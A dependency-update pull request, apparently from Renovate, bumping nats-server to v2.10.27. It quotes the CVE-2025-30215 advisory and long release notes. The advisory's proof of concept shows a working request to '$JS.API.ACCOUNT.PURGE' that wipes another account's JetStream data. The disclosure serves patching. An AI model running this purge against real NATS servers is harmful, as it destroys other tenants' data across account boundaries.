Skip to content

Conversation

@renovate
Copy link
Contributor

@renovate renovate bot commented Apr 15, 2025

This PR contains the following updates:

Package Change Age Confidence
github.com/nats-io/nats-server/v2 v2.10.17 -> v2.10.27 age confidence

GitHub Vulnerability Alerts

CVE-2025-30215

Advisory

The management of JetStream assets happens with messages in the $JS. subject namespace in the system account; this is partially exposed into regular accounts to allow account holders to manage their assets.

Some of the JS API requests were missing access controls, allowing any user with JS management permissions in any account to perform certain administrative actions on any JS asset in any other account. At least one of the unprotected APIs allows for data destruction. None of the affected APIs allow disclosing stream contents.

Affected versions

NATS Server:

  • Version 2 from v2.2.0 onwards, prior to v2.11.1 or v2.10.27

Original Report

(Lightly edited to confirm some supposition and in the summary to use past tense)

Summary

nats-server did not include authorization checks on 4 separate admin-level JetStream APIs: account purge, server remove, account stream move, and account stream cancel-move.

In all cases, APIs are not properly restricted to system-account users. Instead, any authorized user can execute the APIs, including across account boundaries, as long as the current user merely has permission to publish on $JS.>.

Only the first seems to be of highest severity. All are included in this single report as they seem likely to have the same underlying root cause.

Reproduction of the ACCOUNT.PURGE case is below. The others are like it.

Details & Impact

Issue 1: $JS.API.ACCOUNT.PURGE.*

Any user may perform an account purge of any other account (including their own).

Risk: total destruction of Jetstream configuration and data.

Issue 2: $JS.API.SERVER.REMOVE

Any user may remove servers from Jetstream clusters.

Risk: Loss of data redundancy, reduction of service quality.

Issue 3: $JS.API.ACCOUNT.STREAM.MOVE.*.* and CANCEL_MOVE

Any user may cause streams to be moved between servers.

Risk: loss of control of data provenance, reduced service quality during move, enumeration of account and/or stream names.

Similarly for $JS.API.ACCOUNT.STREAM.CANCEL_MOVE.*.*

Mitigations

It appears that users without permission to publish on $JS.API.ACCOUNT.> or $JS.API.SERVER.> are unable to execute the above APIs.

Unfortunately, in many configurations, an 'admin' user for a single account will be given permissions for $JS.> (or simply >), which allows the improper access to the system APIs above.

Scope of impact

Issues 1 and 3 both cross boundaries between accounts, violating promised account isolation. All 3 allow system level access to non-system account users.

While I cannot speak to what authz configurations are actually found in the wild, per the discussion in Mitigations above, it seems likely that at least some configurations are vulnerable.

Additional notes

It appears that $JS.API.META.LEADER.STEPDOWN does properly restrict to system account users. As such, this may be a pattern for how to properly authorize these other APIs.

PoC

Environment

Tested with:
nats-server 2.10.26 (installed via homebrew)
nats cli 0.1.6 (installed via homebrew)
macOS 13.7.4

Reproduction steps

$ nats-server --version
nats-server: v2.10.26

$ nats --version
0.1.6

$ cat nats-server.conf
listen: '0.0.0.0:4233'
jetstream: {
  store_dir: './tmp'
}
accounts: {
  '$SYS': {
    users: [{user: 'sys', password: 'sys'}]
  },
  'TEST': {
    jetstream: true,
    users: [{user: 'a', password: 'a'}]
  },
  'TEST2': {
    jetstream: true,
    users: [{user: 'b', password: 'b'}]
  }
}

$ nats-server -c ./nats-server.conf
...
[90608] 2025/03/02 11:43:18.494663 [INF] Using configuration file: ./nats-server.conf
...
[90608] 2025/03/02 11:43:18.496395 [INF] Listening for client connections on 0.0.0.0:4233
...

# Authentication is effectively enabled by the server:
$ nats -s nats://localhost:4233 account info
nats: error: setup failed: nats: Authorization Violation

$ nats -s nats://localhost:4233 account info --user sys --password wrong
nats: error: setup failed: nats: Authorization Violation

$ nats -s nats://localhost:4233 account info --user a --password wrong
nats: error: setup failed: nats: Authorization Violation

$ nats -s nats://localhost:4233 account info --user b --password wrong
nats: error: setup failed: nats: Authorization Violation

# Valid credentials work, and users properly matched to accounts:
$ nats -s nats://localhost:4233 account info --user sys --password sys
Account Information
                      User: sys
                   Account: $SYS
...

$ nats -s nats://localhost:4233 account info --user a --password a
Account Information
                           User: a
                        Account: TEST
...

$ nats -s nats://localhost:4233 account info --user b --password b
Account Information
                           User: b
                        Account: TEST2
...

# Add a stream and messages to account TEST (user 'a'):
$ nats -s nats://localhost:4233 --user a --password a stream add stream1 --subjects s1 --storage file --defaults
Stream stream1 was created
...

$ nats -s nats://localhost:4233 --user a --password a publish s1 --count 3 "msg "
11:50:05 Published 5 bytes to "s1"
11:50:05 Published 5 bytes to "s1"
11:50:05 Published 5 bytes to "s1"

# Messages are correctly persisted on account TEST, and not on TEST2:
$ nats -s nats://localhost:4233 --user a --password a stream ls
╭───────────────────────────────────────────────────────────────────────────────╮
│                                    Streams                                    │
├─────────┬─────────────┬─────────────────────┬──────────┬───────┬──────────────┤
│ Name    │ Description │ Created             │ Messages │ Size  │ Last Message │
├─────────┼─────────────┼─────────────────────┼──────────┼───────┼──────────────┤
│ stream1 │             │ 2025-03-02 11:48:49 │ 3        │ 111 B │ 46.01s       │
╰─────────┴─────────────┴─────────────────────┴──────────┴───────┴──────────────╯

$ nats -s nats://localhost:4233 --user b --password b stream ls
No Streams defined

$ du -h tmp/jetstream
  0B	tmp/jetstream/TEST/streams/stream1/obs
8.0K	tmp/jetstream/TEST/streams/stream1/msgs
 16K	tmp/jetstream/TEST/streams/stream1
 16K	tmp/jetstream/TEST/streams
 16K	tmp/jetstream/TEST
 16K	tmp/jetstream

# User b (account TEST2) sends a PURGE command for account TEST (user a).

# According to the source comments, user b shouldn't even be able to purge it's own account, much less another one.
$ nats -s nats://localhost:4233 --user b --password b request '$JS.API.ACCOUNT.PURGE.TEST' ''
11:54:50 Sending request on "$JS.API.ACCOUNT.PURGE.TEST"
11:54:50 Received with rtt 1.528042ms
{"type":"io.nats.jetstream.api.v1.account_purge_response","initiated":true}

# From nats-server in response to the purge request:
[90608] 2025/03/02 11:54:50.277144 [INF] Purge request for account TEST (streams: 1, hasAccount: true)

# And indeed, the stream data is gone on account TEST:
$ du -h tmp/jetstream
  0B	tmp/jetstream

$ nats -s nats://localhost:4233 --user a --password a stream ls
No Streams defined


Release Notes

nats-io/nats-server (github.com/nats-io/nats-server/v2)

v2.10.27

Compare Source

Changelog

Go Version
  • 1.24.1
CVEs
  • This release contains fixes for CVE-2025-30215, a CRITICAL severity vulnerability affecting all NATS Server versions from v2.2.0, prior to v2.11.1 or v2.10.27.
Fixed

JetStream

  • Correctly validate the calling account on a number of system API calls
  • Check system and account limits when processing a stream restore
  • Fixed a performance regression when using max messages per subject of 1 (#​6688)
Complete Changes

v2.10.26

Compare Source

Changelog

Refer to the 2.10 Upgrade Guide for backwards compatibility notes with 2.9.x.

Go Version
Dependencies
  • github.com/nats-io/nats.go v1.39.1 (#​6574)
  • golang.org/x/crypto v0.34.0 (#​6574)
  • golang.org/x/sys v0.30.0 (#​6487)
  • golang.org/x/time v0.10.0 (#​6487)
  • github.com/nats-io/nkeys v0.4.10 (#​6494)
  • github.com/klauspost/compress v1.18.0 (#​6565)
Added

General

  • New server option no_fast_producer_stall allows disabling the stall gates, instead preferring to drop messages to consumers that would have resulted in a stall instead (#​6500)
  • New server option first_info_timeout to control how long a leafnode connection should wait for the initial connection info, useful for high latency links (#​5424)

Monitoring

  • The gatewayz monitoring endpoint can now return subscription information (#​6525)
  • The raftz and ipqueuesz endpoints are now exposed via the system account as well (#​6439)
Improved

General

  • The configured write deadline is now applied to only the current batch of write vectors (with a maximum of 64MB), making it easier to configure and reason about (#​6471)
  • Publishing through a service import to an account with no interest will now generate a "no responders" error instead of silently dropping the message (#​6532)
  • Adjust the stall gate for producers to be less penalizing (#​6568, #​6579)

JetStream

  • Consumer signaling from streams has been optimized, taking consumer filters into account, significantly reducing CPU usage and overheads when there are a large number of consumers with sparse or non-overlapping interest (#​6499)
  • Num pending with multiple filters, enforcing per-subject limits and loading the per-subject info now use a faster subject tree lookup with fewer allocations (#​6458)
  • Optimizations for calculating num pending etc. by handling literal subjects using a faster path (#​6446)
  • Optimizations for loading the next message with multiple filters by avoiding linear scans in message blocks in some cases, particularly where there are lots of deletes or a small number of subjects (#​6448)
  • Avoid unnecessary system time calls when ranging a large number of interior deletes, reducing CPU time (#​6450)
  • Removed unnecessary locking around finding out if Raft groups are leaderless, reducing contention (#​6438)
  • Improved the error message when trying to change the consumer type (#​6408)
  • Improved the error messages returned by healthz to be more descriptive about why the healthcheck failed (#​6416)
  • The limit of concurrent disk I/O operations that JetStream can perform simultaneously has been raised (#​6449)
  • Reduced the number of allocations needed for handling client info headers around the JetStream API and service imports/exports (#​6453)
  • Calculating the starting sequence for a source consumer has been optimized for streams where there are many interior deletes (#​6461)
  • Messages used for cluster replication are now correctly accounted for in the statistics of the origin account (#​6474)
  • Reduce the amount of time taken for cluster nodes to start campaigning in some cases (#​6511)
  • Reduce memory allocations when writing new messages to the filestore write-through cache (#​6576)

Monitoring

  • The routez endpoint now reports pending_bytes (#​6476)
Fixed

General

  • The max_closed_clients option is now parsed correctly from the server configuration file (#​6497)

JetStream

  • A bug in the subject state tracking that could result in in consumers skipping messages on interest or WQ streams has been fixed (#​6526)
  • A data race between the stream config and looking up streams has been fixed (#​6424) Thanks to @​evankanderson!
  • Fixed an issue where Raft proposals were incorrectly dropped after a peer remove operation, which could result in a stream desync (#​6456)
  • Stream disk reservations will no longer be counted multiple times after stream reset errors have occurred (#​6457)
  • Fixed an issue where a stream could desync if the server exited during a catchup (#​6459)
  • Fixed a deadlock that could occur when cleaning up large numbers of consumers that have reached their inactivity threshold (#​6460)
  • A bug which could result in stuck consumers after a leader change has been fixed (#​6469)
  • Fixed an issue where it was not possible to update a stream or consumer if up against the max streams or max consumers limit (#​6477)
  • The preferred stream leader will no longer respond if it has not completed setting up the Raft node yet, fixing some API timeouts on stream info and other API calls shortly after the stream is created (#​6480)
  • Auth callouts can now correctly authenticate the username and password or authorization token from a leafnode connection (#​6492)
  • Stream ingest from an imported subject will now continue to work correctly after an update to imports/exports via a JWT update (#​6498)
  • Parallel stream creation requests for the same stream will no longer incorrectly return a limits error when max streams is configured (#​6502)
  • Consumers created or recreated while a cluster node was down are now handled correctly after a snapshot when the node comes back online (#​6507)
  • Invalidate entries in the pending append entry cache correctly, reducing the chance of an incorrect apply (#​6513)
  • When compacting or truncating streams or logs, correctly clean up the delete map, fixing potential memory leaks and the potential for index.db to not be recovered correctly after a restart (#​6515)
  • Retry removals from acks if they have been missed due to the consumer ack floor being ahead of the stream applies, correcting a potential stream drift across replicas (#​6519)
  • When recovering from block files, do not put deleted messages below the first sequence into the delete map (#​6521)
  • Preserve max delivered messages with interest retention policy using the redelivered state, such that a new consumer will not unexpectedly remove the message (#​6575)

Leafnodes

  • Do not incorrectly send duplicate messages when a queue group has members across different leafnodes when connected through a gateway (#​6517)

WebSockets

  • Fixed a couple cases where memory may not be reclaimed from Flate compressors correctly after a WebSocket client disconnect or error scenario (#​6451)

Tests

Complete Changes

v2.10.25

Compare Source

Changelog

Refer to the 2.10 Upgrade Guide for backwards compatibility notes with 2.9.x.

Go Version
Dependencies
Improved

JetStream

  • Raft groups will no longer snapshot too often in some situations, improving performance (#​6277)
  • Optimistically perform stream and consumer snapshots on a normal shutdown (#​6279)
  • The stream snapshot interval has been removed, now relying on the compaction minimum, which improves performance (#​6289)
  • Raft groups will no longer report current while they are paused with pending commits (#​6317)
  • Unnecessary client info fields have been removed from stream and consumer assignment proposals, API advisories and stream snapshot/restore advisories (#​6326, #​6338)
  • Reduced lock contention between the JetStream lock and Raft group locks (#​6335)
  • Advisories will only be encoded and sent when there is interest, reducing CPU usage (#​6341)
  • Consumers with inactivity thresholds will now start less clean-up goroutines, which can reduce load on the goroutine scheduler (#​6344)
  • Consumer cleanup goroutines will now stop faster when the server shuts down (#​6351)
Fixed

JetStream

  • Subject state consistency with some message removal patterns (#​6226)
  • A performance issue has been fixed when updating the per-subject state (#​6235)
  • Fixed consistency issues with detecting partial writes in the filestore (#​6283)
  • A race condition between removing peers and updating replica counts has been fixed (#​6316)
  • Pre-acks for a sequence are now removed when the message is removed, correcting a potential memory leak (#​6325)
  • Metalayer snapshot errors are now surfaced correctly (#​6361)
  • Healthchecks no longer re-evaluate stream and consumer assignments, avoiding some streams and consumers being unexpectedly recreated shortly after a deletion (#​6362)
  • Clients should no longer timeout on a retried ack with the AckAll policy after a server restart (#​6392)
  • Replicated consumers should no longer get stuck after leader changes due to incorrect accounting (#​6387)
  • Consumers will now correctly handle the case where messages queued for delivery have been removed, fixing a delivery slowdown (#​6387, #​6399)
  • The API in-flight metric has been fixed so that it does not drift after the queue has been dropped (#​6373)
  • Handles for temporary files are now closed correctly if compression errors occur (#​6390) — Thanks to @​deem0n for the contribution!
  • JetStream will now shut down correctly when detecting that the store directory underlying filesystem has become read-only (#​6292) — Thanks to @​souravagrawal for the contribution!

Leafnodes

  • Fixed an interest propagation issue that could occur when the hub has a user with subscribe permissions on a literal subject (#​6291)
  • Fixed a bug where all queue interest across leafnodes could be dropped over gateways in a supercluster deployment after a leafnode connection drops (#​6377)

Tests

Complete Changes

v2.10.24

Compare Source

Changelog

Refer to the 2.10 Upgrade Guide for backwards compatibility notes with 2.9.x.

CVEs
  • Vulnerability check warnings for CVE-2024-45337 are addressed by the dependency update to x/crypto, although the NATS Server does not use the affected functionality and is therefore not vulnerable
Go Version
  • 1.23.4
Dependencies
  • golang.org/x/crypto v0.31.0 (#​6246)
  • github.com/nats-io/jwt/v2 v2.7.3 (#​6256)
  • github.com/nats-io/nkeys v0.4.9 (#​6255)
Fixed

General

  • Request/reply tracking with allow_responses permission is now pruned more regularly, fixing performance issues that can get worse over time (#​6064)

JetStream

  • Revert a change introduced in 2.10.23 that could potentially cause a consumer info call to fail if it takes place immediately after the consumer was created in some large or heavily-loaded clustered setups (#​6250)
  • Minor fixes to subject state tracking (#​6244)
  • Minor fixes to healthz and healthchecks (#​6247, #​6248, #​6232)
  • A calculation used to determine if exceeding limits has been corrected (#​6264)
  • Raft groups will no longer spin when truncating the log fails, i.e. during shutdown (#​6271)

WebSockets

  • A WebSocket close frame will no longer incorrectly include a status code when not needed (#​6260)
Complete Changes

v2.10.23

Compare Source

Changelog

Refer to the 2.10 Upgrade Guide for backwards compatibility notes with 2.9.x.

Go Version
Dependencies
Added

JetStream

  • Support for responding to forwarded proposals (for future use, #​6157)

Windows

  • New ca_certs_match option has been added in the tls block for searching the certificate store for only certificates matching the specified CAs (#​5115)
  • New cert_match_skip_invalid option has been added in the tls block for ignoring certificates that have expired or are not valid yet (#​6042)
  • The cert_match_by option can now be set to thumbprint, allowing an SHA1 thumbprint to be specified in cert_match (#​6042, #​6047)
Improved

JetStream

  • Reduced the number of allocations in consumers from get-next requests and when returning some error codes (#​6039)
  • Metalayer recovery at startup will now more reliably group assets for creation/update/deletion and handle pending consumers more reliably, reducing the chance of ghost consumers and misconfigured streams happening after restarts (#​6066, #​6069, #​6088, #​6092)
  • Creation of filtered consumers is now considerably faster with the addition of a new multi-subject num-pending calculation (#​6089, #​6112)
  • Consumer backoff should now be correctly respected with multiple in-flight deliveries to clients (#​6104)
  • Add node10 node size to stree, providing better memory utilisation for some subject spaces, particularly those that are primarily numeric or with numeric tokens (#​6106)
  • Some JetStream log lines have been made more consistent (#​6065)
  • File-backed Raft groups will now use the same sync intervals as the filestore, including when sync always is in use (#​6041)
  • Metalayer snapshots will now always be attempted on shutdown (#​6067)
  • Consumers will now detect if an ack is received past the stream last sequence and will no longer register pre-acks from a snapshot if this happens, reducing memory usage (#​6109)
  • Reduced copies and number of allocations when generating headers for republished messages (#​6127)
  • Adjusted the spread of filestore sync timers (#​6128)
  • Reduced the number of allocations in Raft group send queues, improving performance (#​6132)
  • Improvements to Raft append entry handling and log consistency (#​5661, #​5689, #​5714, #​5957, #​6027, #​6073)
  • Improvements to Raft stepdown behaviour (#​5666, #​5344, #​5717)
  • Improvements to Raft elections and vote handling (#​5671, #​6056)
  • Improvements to Raft term handling (#​5684, #​5792, #​5975, #​5848, #​6060)
  • Improvements to Raft catchups (#​5987, #​6038, #​6072)
  • Improvements to Raft snapshot handling (#​6053, #​6055)
  • Reduced the overall metalayer snapshot frequency by increasing the minimum interval and no longer pre-empting consumer deletes (#​6165)
  • Consumer info requests for non-existent consumers will no longer be relayed, reducing overall load on the metaleader (#​6176)
  • The metaleader will now log if it takes a long time to perform a metalayer snapshot (#​6178)
  • Unnecessary client and subject information will no longer be included in the meta snapshots, reducing the size and encoding time (#​6185)
  • Sourcing consumers for R1 streams will now be set up inline when the stream is recovered (#​6219)
  • Introduced additional jitter to the timer for writing stream state, to smooth out sudden spikes in I/O (#​6220)
Fixed

General

  • Load balancing queue groups from leaf nodes in a cluster (#​6043)

JetStream

  • Invalidate the stream state when a drift between the tracking states has been detected (#​6034)
  • Fixed a panic in the subject tree when checking for full wildcards (#​6049)
  • Snapshot processing should no longer spin when there is no leader (#​6050)
  • Replicated stream message framing can no longer overflow with extremely long subjects, headers or reply subjects (#​6052)
  • Don’t replace the leader’s snapshot when shutting down, potentially causing a desync (#​6053)
  • Consumer start sequence when specifying an optional start time has been fixed (#​6082)
  • Raft snapshots will no longer be incorrectly removed when truncating the log back to applied (#​6055)
  • Raft state will no longer be deleted if creating a stream/consumer failed because the server was shutting down (#​6061)
  • Fixed a panic when shutting down whilst trying to set up the metagroup (#​6075)
  • Raft entries that we cannot be sure were applied during a shutdown will no longer be reported as applied (#​6087)
  • Corrected an off-by-one error in the run-length encoding of interior deletes, which could incorrectly remove an extra message (#​6111)
  • Don’t process duplicate stream assignment responses when the stream is being reassigned due to placement issues (#​6121)
  • Corrected use of the stream mutex when checking interest (#​6122)
  • Raft entries for consumers that we cannot be sure were applied during a shutdown will no longer be reported as applied (#​6133)
  • Consistent state update behavior between file store and memory store, including a fixed integer underflow (#​6147)
  • No longer send a state snapshot when becoming a consumer leader as it may not include all applied state (#​6151)
  • Do not install snapshots on shutdown from outside the monitor goroutines as it may race with upper layer state (#​6153)
  • The consumer Backoff configuration option now correctly checks the MaxDelivery constraint (#​6154)
  • Consumer check floor will no longer surpass the store ack floor (#​6146)
  • Replicated consumers will no longer update their delivered state until quorum is reached, fixing some drifts that can occur on a leader change (#​6139)
  • Resolved a deadlock when removing the leader from the peer set (#​5912)
  • Don’t delete disk state if a stream or consumer creation fails during shutdown (#​6061)
  • The metalayer will no longer generate and send snapshots when switching leaders, reducing the chance that snapshots can be sent with stale assignments (#​5700)
  • When restarting a Raft group, wait for previous goroutines to shut down, fixing a race condition (#​5832)
  • Correctly empty the Raft snapshots directory for in-memory assets (#​6169)
  • A race condition when accessing the stream assignments has been fixed (#​6173)
  • Subject state will now be correctly cleared when compacting in-memory streams, fixing some potential replica drift issues (#​6187)
  • Stream-level catchups no longer return more than they should (#​6213)

Leafnodes

  • Fixed queue distribution where a leafnode expressed interest on behalf of a gateway in complex setups (#​6126)
  • A number of leafnode interest propagation issues have been fixed, making it possible to distinguish leaf subscriptions from local routed subscriptions (#​6161)
  • Credential files containing CRLF line endings will no longer error (#​6175)

WebSockets

  • Ensure full writes are made when compression is in use (#​6091)

Windows

  • Using the LocalMachine certificate store is now possible from a non-administrator user (#​6019)

Tests

Complete Changes

v2.10.22

Compare Source

Changelog

Refer to the 2.10 Upgrade Guide for backwards compatibility notes with 2.9.x.

Go Version
  • 1.22.8
Dependencies
  • golang.org/x/crypto v0.28.0 (#​5971)
  • golang.org/x/sys v0.26.0 (#​5971)
  • golang.org/x/time v0.7.0 (#​5971)
  • go.uber.org/automaxprocs v1.6.0 (#​5944)
  • github.com/klauspost/compress v1.17.11 (#​6002)
Added

Config

  • A warning will now be logged at startup if the JetStream store directory appears to be in a temporary folder (#​5935)
Improved

General

  • More efficient searching of sublists for the number of subscriptions (#​5918)

JetStream

  • Improve performance when checking interest and correcting ack state on interest-based or work queue streams (#​5963)
  • Safer default file permissions for JetStream filestore and logs (#​6013)
Fixed

JetStream

  • Large number of message delete tombstones will no longer result in unusually large message blocks on disk (#​5973)
  • The server will no longer panic when restoring corrupted subject state containing null characters (#​5978)
  • A data race when processing append entries has been fixed (#​5970)
  • Fix a stream desync across replicas that could occur after stalled or failed catch-ups (#​5939)
  • Consumers will no longer race with the filestore when fetching messages, fixing some cases where consumers can get stuck with workqueue streams and max messages per subject limits (#​6003)
  • Pull consumers will now recalculate max delivered when expiring messages, such that the redelivered status does not report incorrectly and cause a stall with a max deliver limit (#​5995)
  • Clustered streams should no longer desync if a catch-up fails due to a loss of leader (#​5986)
  • Fixed a panic that could occur when calculating asset placement in a JetStream cluster (#​5996)
  • Fixed a panic when shutting down a clustered stream (#​6007)
  • Revert earlier PR #​5785 to restore consumer start sequence clipping, fixing an issue where sourcing/mirroring consumers could skip messages (#​6014)

Leafnodes

  • Load balancing of queue groups over leafnode connections (#​5982)
Complete Changes

v2.10.21

Compare Source

Changelog

Refer to the 2.10 Upgrade Guide for backwards compatibility notes with 2.9.x.

Go Version
  • 1.22.7
Dependencies
Added

Config

  • New TLS min_version option for configuring the minimum supported TLS version (#​5904)
Improved

JetStream

  • Global JetStream API queue hard limit for protecting the system (#​5900, #​5923)
  • Orphaned ephemeral consumer clean-up is now logged at debug level only (#​5917)

Monitoring

  • statsz messages are now sent every 10 seconds instead of every 30 seconds (#​5925)
  • Include JetStream pending API request count in statsz messages and jsz responses for monitoring (#​5923, #​5926)
Fixed

JetStream

  • Fix an issue comparing the stream configuration with the updated stream assignment on stream create (#​5854)
  • Improvements to recovering from old or corrupted index.db (#​5893, #​5901, #​5907)
  • Ensure that consumer replicas and placement are adjusted properly when scaling down a replicated stream (#​5927)
  • Fix a panic that could occur when trying to shut down while the JetStream meta group was in the process of being set up (#​5934)

Monitoring

  • Always update account issuer in accountsz (#​5886)

OCSP

  • Fix peer validation on the HTTPS monitoring port when OCSP is enabled (#​5906)

Config

  • Support multiple trusted operators using a config file (#​5896)
Complete Changes

v2.10.20

Compare Source

Changelog

Refer to the 2.10 Upgrade Guide for backwards compatibility notes with 2.9.x.

Go Version
  • 1.22.6
Fixed

JetStream

  • Fix regression in KV CAS operations on R=1 replicas introduced in v2.10.19 (#​5841) Thanks to @​cbrewster for the report!
Complete Changes

v2.10.19

Compare Source

Changelog

Refer to the 2.10 Upgrade Guide for backwards compatibility notes with 2.9.x.

Go Version
  • 1.22.6
Dependencies
Improved

General

  • Reduced allocations in various code paths that check for subscription interest (#​5736, #​5744)
  • Subscription matching for gateways and reply tracking has been optimized (#​5735)
  • Client outbound queues now limit the number of flushed vectors to ensure that very large outbound buffers don’t unfairly compete with write deadlines (#​5750)
  • In client and leafnode results cache, populate new entry after pruning (#​5760)
  • Use newly-available generic sorting functions (#​5757)
  • Set a HTTP read timeout on profiling, monitoring and OCSP HTTP servers (#​5790)
  • Improve behavior of rate-limited warning logs (#​5793)
  • Use dedicated queues for the handling of statsz and profilez system events (#​5816)

Clustering

  • Reduce the chances of implicit routes being duplicated (#​5602)

JetStream

  • Optimize LoadNextMsg for wildcard consumers that are consuming over a large subject space (#​5710)
  • When sync/sync_interval is set to always, metadata files for streams and consumers are now written using O_SYNC to guarantee flushes to disk (#​5729)
  • Walking an entire subject tree is now faster and allocates less (#​5734)
  • Try to snapshot stream state when a change in the clustered last failed sequence is detected (#​5812)
  • Message blocks are no longer loaded into memory unnecessarily when checking if we can skip ahead when loading the next message (#​5819)
  • Don’t attempt to re-compact blocks that cannot be compacted, reducing unnecessary CPU usage and disk I/Os (#​5831)

Monitoring

  • Add StreamLeaderOnly filter option to return replica results only for groups for which that node is the leader (#​5704)
  • The profilez API endpoint in the system account can now acquire and return CPU profiles (#​5743)

Miscellaneous

Fixed

General

  • Fixed a panic when looking up the account for a client (#​5713)
  • The ClientURL() function now returns correctly formatted IPv6 host literals (#​5725)
  • Fixed incorrect import cycle warnings when subject mapping is in use (#​5755)
  • A race condition that could cause slow consumers to leave behind subscription interest after the connection has been closed has been fixed (#​5754)
  • Corrected an off-by-one condition when growing to or shrinking from node48 in the subject tree (#​5826)

JetStream

  • Retention issue that could cause messages to be incorrectly removed on a WorkQueuePolicy stream when consumers did not cover the entire subject space (#​5697)
  • Fixed a panic when calling the raftz endpoint during shutdown (#​5672)
  • Don’t delete NRG group persistent state on disk when failing to create subscriptions (#​5687)
  • Fixed behavior when checking for the first block that matches a consumer subject filter (#​5709)
  • Reduce the number of compactions made on filestore blocks due to deleted message tombstones (#​5719)
  • Fixed maximum messages per subject exceeded unexpected error on streams using a max messages per subject limit of 1 and discard new retention policy (#​5761)
  • Fixed bad meta state on restart that could cause deletion of assets (#​5767)
  • Fixed R1 streams exceeding quota limits (#​5771)
  • Return the correct sequence for a duplicated message on an interest policy stream when there is no interest (#​5818)
  • Fixed setting the consumer start sequence when that sequence does not yet appear in the stream (#​5785)
  • Connection type in scoped signing keys are now honored correctly (#​5789)
  • Expected last sequence per subject logic has now been harmonized across clustered stream leaders and followers, fixing a potential drift (#​5794)
  • Stream snapshots are now always installed correctly on graceful shutdown (#​5809)
  • A data race between consumer and stream updates has been resolved (#​5820)
  • Avoid increasing the cluster last fa

Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.


  • If you want to rebase/retry this PR, check this box

This PR was generated by Mend Renovate. View the repository job log.

@renovate
Copy link
Contributor Author

renovate bot commented Apr 15, 2025

ℹ Artifact update notice

File name: go.mod

In order to perform the update(s) described in the table above, Renovate ran the go get command, which resulted in the following additional change(s):

  • 10 additional dependencies were updated
  • The go directive was updated for compatibility reasons

Details:

Package Change
go 1.22 -> 1.23.0
github.com/nats-io/nats.go v1.36.0 -> v1.39.1
github.com/klauspost/compress v1.17.9 -> v1.18.0
github.com/minio/highwayhash v1.0.2 -> v1.0.3
github.com/nats-io/jwt/v2 v2.5.7 -> v2.7.3
github.com/nats-io/nkeys v0.4.7 -> v0.4.10
go.uber.org/automaxprocs v1.5.3 -> v1.6.0
golang.org/x/crypto v0.24.0 -> v0.34.0
golang.org/x/sys v0.21.0 -> v0.30.0
golang.org/x/text v0.16.0 -> v0.22.0
golang.org/x/time v0.5.0 -> v0.10.0

@codecov
Copy link

codecov bot commented Apr 15, 2025

Codecov Report

All modified and coverable lines are covered by tests ✅

Project coverage is 54.44%. Comparing base (3cf2082) to head (1dd0113).

Additional details and impacted files
@@            Coverage Diff             @@
##             main      #76      +/-   ##
==========================================
- Coverage   54.81%   54.44%   -0.38%     
==========================================
  Files          25       25              
  Lines        1609     1969     +360     
==========================================
+ Hits          882     1072     +190     
- Misses        630      800     +170     
  Partials       97       97              

☔ View full report in Codecov by Sentry.
📢 Have feedback on the report? Share it here.

🚀 New features to boost your workflow:
  • ❄️ Test Analytics: Detect flaky tests, report on failures, and find test suite problems.
  • 📦 JS Bundle Analysis: Save yourself from yourself by tracking and limiting bundle sizes in JS merges.

@renovate renovate bot force-pushed the renovate/go-github.com-nats-io-nats-server-v2-vulnerability branch from 3cb83fd to 1dd0113 Compare May 7, 2025 11:02
@renovate renovate bot force-pushed the renovate/go-github.com-nats-io-nats-server-v2-vulnerability branch from 1dd0113 to 35725fc Compare August 10, 2025 14:04
@renovate renovate bot force-pushed the renovate/go-github.com-nats-io-nats-server-v2-vulnerability branch from 35725fc to 69e2624 Compare October 9, 2025 09:53
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Projects

None yet

Development

Successfully merging this pull request may close these issues.

1 participant